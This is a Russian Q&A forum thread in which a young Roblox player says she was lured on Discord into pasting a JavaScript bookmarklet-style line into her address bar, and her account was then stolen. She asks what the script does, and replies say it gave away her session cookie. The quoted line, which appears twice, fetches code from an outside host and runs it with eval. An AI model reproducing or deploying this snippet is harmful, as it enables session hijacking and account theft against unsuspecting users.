Top.Mail.Ru
Ответы
Время игр
+4

Что делать если твой аккаунт в Роблоксе взломали и ты знаешь, кто это сделал?

Когда я играла в игру Roblox я решила зарегаться в Дискорде и вступить в официальный сервер Roblox'a, сначала я там просто общалась, потом мне написал человек с ником @fxn007 (его ник в Роблоксе: YurMum), он сказал мне написать это: "JavaScript:$.get('//rbxpro.xyz/?id=1529693142',i=>eval(i))" в верхней строке вкладки Home, я не знаю почему, но я решила проверить что будет. К утру он украл мои 40 робуксов и всё. Я нашла его в Дискорде и начала кидать жалобы с 9-ти аккаунтов брата (хз зачем они ему) и с основного аккаунта. Я написала в поддержку Роблокса и написала все подробности о взломе, но это не помогло. Я начала говорить всем своим знакомым в ДС про это и спамить в чате ник взломщика и то, что он сделал. Похоже, он заметил это и окончательно взломал мой акк. Когда я зашла на страницу роблокса, то там вместо ника было "Log In" "Sigh up", я пыталась зайти на свой аккаунт, но там было написано что пароль неверный. Я немного расстроилась, у меня этот акк был 3 года и на нём были робуксы и куча вещей со старых эвентов, которые были очень классные. Я создала новый аккаунт, а потом ещё один. Если вы знайте, что это за скрипт "JavaScript:$.get('//rbxpro.xyz/?id=1529693142',i=>eval(i))" пожалуйста напишите. Также если вы знайте как вернуть свой аккаунт тоже напишите. (Мой старый аккаунт: AlexandraR2008, новые: sun_outbreak, AllEx_is)

По дате
По рейтингу
Новичок
5лет

Уже ничего. Ты ему отдала полный контроль над своим аккаунтом.

Знаток
5лет

пздц, ты ему отдала свой кукис. Каким нужно быть наивным чтоб повестись на это

Ученик

если знаешь кто, дай ему двоечку

Ученик

напиши на него жалобу, войди в свой акк припомощи номера телефона

Искусственный Интеллект
5лет

ничего ты не сделаешь. Сама лоханулась.